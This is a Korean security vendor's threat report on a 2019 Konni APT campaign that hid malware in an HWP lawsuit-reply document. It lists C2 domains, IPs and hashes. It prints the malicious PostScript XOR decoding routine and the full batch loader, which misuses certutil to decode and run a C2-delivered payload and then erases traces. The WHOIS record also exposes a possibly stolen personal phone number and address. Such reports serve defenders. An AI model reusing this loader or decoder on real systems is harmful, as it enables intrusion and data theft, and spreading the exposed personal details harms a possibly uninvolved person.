코니(Konni) 조직, 병원관련 소송 답변 문서로 위장한 APT 공격 수행

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다.

2019년 12월 12일, 알약(ALYac)에 탑재되어 있는 ETI 위협정보 수집기능을 통해 '코니(Konni)' 조직으로 분류된 신규 APT 위협정보가 식별됐습니다.

초기 공격 링크에 'error-hanmail[.]net' 도메인이 사용되었으며, 다시 'mallesr[.]com' C2 주소로 이어집니다.

탐지된 침해지표(IoC)를 분석한 결과, 광주 성형외과 운영관계자 간 법적소송 문건을 담고 있는 악성 한글(HWP)문서가 공격벡터에 활용되었습니다.

ESRC는 그동안 코니 조직이 사용했던 위협패턴과 전술 정황을 고려해 '스피어 피싱(Spear Phishing)'을 통해 악성 문서가 전달되었을 것이라 추정하고 있습니다.

이번 공격에 사용된 악성 파일명에 실제 성형외과의 대표명이 포함되어 있어 일부 * 표시했습니다.

파일명	최종 수정자	최종 수정일	C2	MD5
이** 답변서 최정본.hwp	Administrator	2019-12-09 08:30:24 (UTC)	error-hanmail[.]net  mallesr[.]com  nottingham39483[.]com	bbde7c694faf6b450adbfc8efe88a41a

위협 배후가 준비한 도메인과 이메일 주소를 정리하면 다음과 같고, 코니 시리즈는 주로 'rambler[.]ru' 러시아 이메일을 사용하고 있습니다.

- error-hanmail[.]net (198.252.103[.]74)

- mallesr[.]com (27.255.81[.]59)

- nottingham39483[.]com (45.58.121[.]194)

- error-naver[.]com (198.252.103[.]74)

- down-error2[.]com (198.252.102[.]112)

- kan-smiko[.]com (172.96.186[.]193)

- kani_smiko@rambler[.]ru

- birmingham1956@rambler[.]ru

HWP 문서 파일 내부에는 악성 포스트 스크립트(Post Script) 코드가 포함되어 있습니다.

[그림 1] 악성 포스트 스크립트가 포함되어 있는 화면

포스트 스크립트에는 16바이트로 구성된 XOR키를 통해 복호화가 진행이 됩니다.

0 1 X240 length 1 sub % %kshvudgsjsye3 {/Y31 exch 1 2 and pop def %kshvudgsjsye3 X240 dup Y31 get <296BD6EB2CA90321BBEF5F5F4CFC10EC> Y31 15 and /Y104 8 def get xor Y31 exch put} for X240 cvx % exec

HWP 악성 문서 파일이 실행되면 다음과 같이 정상적인 소송관련 답변서 내용이 보여집니다.

[그림 1-1] 악성 문서 실행 후 보여지는 문서 내용

그런데 여기서 사용된 복호화 키는 이미 지난 10월 01일 리포팅되었던 【코니(Konni) APT 조직, HWP 취약점을 이용한 'Coin Plan' 작전 감행】 보고서와 동일하게 사용됩니다.

[그림 2] 포스트 스크립트 내부 디코딩 루틴 화면

디코딩 과정을 거치면 쉘코드(Shellcode)가 포함된 2차 포스트 스크립트가 나타납니다.

이 쉘코드를 통해 명령제어(C2) 서버로 통신을 시도하게 됩니다.

[그림 3] 포스트 스크립트에 포함되어 있는 쉘코드 화면

쉘코드가 작동하면 C2 서버로 통신을 시도하며, 'vbs.txt' 파일을 로드하게 됩니다.

[그림 4] 쉘코드 명령어 부분

C2  호스트명	IP
nottingham39483[.]com	45.58.121[.]194

C2 주소와 통신이 성공되면, 'vbs.txt' 파일이 존재하는 경로로 접근을 수행합니다.

'vbs.txt' 파일은 Base64 형식으로 인코딩된 데이터를 포함하고 있습니다. 그리고 C2에 추가로 등록되어 있는 'no1.txt' 파일의 명령을 수행합니다.

[그림 5] 'vbs.txt' 파일을 메모장으로 열어본 화면

'no1.txt' 파일은 내부에 다음과 같은 명령어를 담고 있습니다.

@echo off cd C:\Users\Public\Documents\ if exist "C:\Users\Public\Documents\notwo.bat" (goto EXIT) copy /y C:\Windows\System32\certutil.exe %~dp0\ct.exe > nul ct -decode -f vbs.txt setup.cab > nul expand setup.cab -F:* %~dp0 > nul del /f /q setup.cab > nul del /f /q vbs.txt > nul if exist "C:\Users\Public\Documents\notwo.bat" ( call notwo.bat > nul ) del /f /q %~dpnx0 > nul :EXIT call notwo.bat > nul del /f /q %~dpnx0 > nul

이 명령어를 통해 'vbs.txt' 파일은 'setup.cab' 압축파일로 변환이 되고, 내부에 포함되어 있는 'notwo.bat' 파일이 실행됩니다.

'setup.cab' 압축 파일 내부에는 총 5개의 파일이 포함되어 있습니다.

- download.vbs

- no4.bat

- notwo.bat

- start.vbs

- upload.vbs

'notwo.bat' 파일에는 기존 코니 캠페인과 동일하게 'pakistan.txt' 파일명이 동일하게 사용되었습니다.

[그림 6] 배치 파일 내부 명령에 포함된 'pakistan.txt' 파일명

각각의 스크립트 명령에 의해 감염된 컴퓨터에 설치되어 있는 각종 프로그램 및 파일 목록, 시스템 정보, 프로세스 리스트, 윈도우 컴퓨터명 등을 C2 서버로 유출 시도합니다.

ESRC는 이번 위협에서 사용된 C2 도메인이 지난 9월 경 생성되었고, 등록자 정보에서 흥미로운 점을 확인했습니다.

악성 도메인은 대한민국의 광주 지역에서 등록되었고, 등록자명은 'JungSuk Park' 입니다.

영문 이름을 한글로 변환하면 '박정석'으로 표기할 수 있습니다.

더불어 도메인 등록용 이메일 주소는 기존 코니 캠페인과 유사한 [rambler.ru] 서비스의 'birmingham1956@rambler[.]ru' 계정이 사용되었습니다.

Domain Name: MALLESR[.]COM
Registry Domain ID: 2429219565_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: www.publicdomainregistry.com
Updated Date: 2019-09-02T07:50:14Z
Creation Date: 2019-09-02T07:50:13Z
Registrar Registration Expiration Date: 2020-09-02T07:50:13Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: JungSuk Park
Registrant Organization:
Registrant Street: Hwajeong-ro 21beon-gil, Seo-gu
Registrant City: Gwangju
Registrant State/Province: Gwangju
Registrant Postal Code: 61991
Registrant Country: KR
Registrant Phone: +82.1091846658
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: birmingham1956(at)rambler.ru

Registry Admin ID: Not Available From Registry

 

ESRC는 도메인 등록에 사용된 휴대폰 번호가 '카카오 톡(Kakao Talk)'에 등록되어 있는 것을 확인했는데, 동일한 인물의 프로필 사진이 다수 등록되어 있었습니다.

프로필 사진 중에는 군복을 입은 사진이 있는데, 한국인은 아닌 것으로 보이며, 공격자가 악성 도메인을 등록시 스마트폰 번호를 무단 도용된 것인지는 아직 불분명합니다.

그리고 일부 사진은 필리핀의 Panampangan 섬 이름이 포함되어 있기도 하며, 한국에서 찍은 것으로 추정되는 화면과 동영상도 존재합니다.

[그림 7] 악성 도메인 등록에 사용된 휴대폰 번호의 카카오 톡 프로필 사진들

ESRC에서는 이와 관련된 위협 인텔리전스 분석을 진행 중이며, 추가적인 침해지표(IoC) 내용은 '쓰렛 인사이드(Threat Inside)' 서비스를 통해 별도로 제공할 예정입니다. 

▶ 코니(Konni) APT 조직, HWP 취약점을 이용한 'Coin Plan' 작전 감행 (2019. 10. 01)

▶ 코니(Konni) APT 그룹, 러시아-북한-한국 무역, 경제관계 투자문서로 공격 수행 (2019. 09. 27)

▶ 코니(Konni) APT 조직, 모바일 스파이 활동을 통한 스마트 위협 증가 (2019. 08. 24)

▶ 코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장 (2019. 08. 19)

▶ [스페셜 리포트] APT 캠페인 'Konni' & 'Kimsuky' 조직의 공통점 발견 (2019. 06. 10)

▶ 한국어 구사 Konni 조직, 블루 스카이 작전 'Amadey' 러시아 봇넷 활용 (2019. 05. 16)

▶ 암호화폐 내용의 Konni APT 캠페인과 '오퍼레이션 헌터 아도니스' (2019. 01. 02)

▶ 새로운 KONNI 캠페인 등장, '작전명 해피 바이러스' (2018. 10. 18)